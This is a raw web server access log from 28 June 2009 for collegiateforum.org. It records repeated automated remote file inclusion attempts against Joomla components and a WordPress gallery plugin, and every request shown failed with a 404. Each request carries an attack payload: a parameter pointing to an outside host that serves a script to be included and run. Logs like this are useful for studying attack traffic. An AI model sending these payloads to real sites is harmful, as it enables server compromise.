200.93.147.154 - - [28/Jun/2009:23:12:05 -0700] "GET /logs/access.log%20%20//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [28/Jun/2009:23:12:32 -0700] "GET /logs/access.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [28/Jun/2009:23:12:37 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
200.93.147.154 - - [28/Jun/2009:23:12:37 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:12:46 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:12:46 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:12:46 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:12:47 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:12:47 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:12:47 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:14:09 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:14:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:14:14 -0700] "GET /administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:23:15:09 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:23:15:09 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
94.23.2.21 - - [28/Jun/2009:23:15:09 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:06 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:06 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:06 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:12 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:12 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:12 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:35 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:35 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:18:35 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:21:05 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:21:05 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:21:05 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:23:21:12 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:23:21:12 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:23:21:12 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:23:25 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:23:25 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:23:25 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:24:21 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:24:21 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:24:21 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:24:26 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:24:26 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:24:26 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:25:09 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:25:26 -0700] "GET /administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:25:26 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:25:26 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:25:33 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:25:33 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:25:33 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:25:40 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:26:16 -0700] "GET /administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:26:16 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:26:16 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:23:26:26 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:23:26:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
216.17.99.13 - - [28/Jun/2009:23:26:26 -0700] "GET /logs/access_081208.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:27:21 -0700] "GET /administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:27:25 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:27:25 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:27:26 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:27:26 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:27:26 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:27:30 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:27:30 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:27:30 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:29:12 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:29:12 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:29:13 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:29:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:29:50 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:29:50 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:30:36 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:30:36 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:30:37 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:30:37 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:30:42 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:30:43 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:30:44 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:03 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:03 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:04 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:04 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:05 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:06 -0700] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:20 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:21 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:22 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:22 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:23 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:31:24 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:32:50 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:32:52 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:23:34:10 -0700] "GET /logs/access_081208.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:23:34:10 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.223.3.98 - - [28/Jun/2009:23:34:10 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:35:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:35:27 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:35:27 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.0.139.129 - - [28/Jun/2009:23:35:28 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:35:38 -0700] "GET /logs/access_081208.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:35:38 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:35:38 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [28/Jun/2009:23:36:01 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:37:02 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:37:02 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:37:03 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:37:11 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:37:12 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
80.93.48.103 - - [28/Jun/2009:23:37:12 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.scoringsessions.com///img/large/2006/missionimpossible3/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
218.232.105.116 - - [28/Jun/2009:23:37:58 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
124.138.156.3 - - [28/Jun/2009:23:39:12 -0700] "GET /logs/access.log//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.138.156.3 - - [28/Jun/2009:23:39:12 -0700] "GET /store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
124.138.156.3 - - [28/Jun/2009:23:39:13 -0700] "GET /logs//store/components/com_virtuemart/fetchscript.php?gzip=0&subdir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [28/Jun/2009:23:39:46 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
